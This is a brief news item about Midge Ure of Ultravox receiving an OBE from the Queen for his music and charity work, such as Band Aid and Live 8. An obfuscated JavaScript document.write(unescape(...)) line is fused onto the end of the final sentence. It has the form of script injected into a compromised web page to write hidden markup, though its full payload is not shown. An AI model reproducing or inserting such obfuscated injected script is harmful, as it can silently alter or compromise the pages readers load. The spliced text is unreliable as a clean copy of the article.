Ultravox frontman Midge Ure has been awarded an OBE.
The singer collected his honour from the Queen at Buckingham Palace on October 18 for his work in both the fields of music and charity.
"It's fantastic. It's wonderful. I've had many awards in my time but nothing so official, so prestigious," Ure told BBC News receiving his the award.
He added the Queen had discussed this summer's G8 conference at the Make Poverty History campaign around it. "She said: 'You've been very busy in the summer,' obviously talking about Live 8," explained Ure.
Ure and Ultravox scored 16 hits before he became involved in the likes of Band Aid, Live Aid and the recent Live 8.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
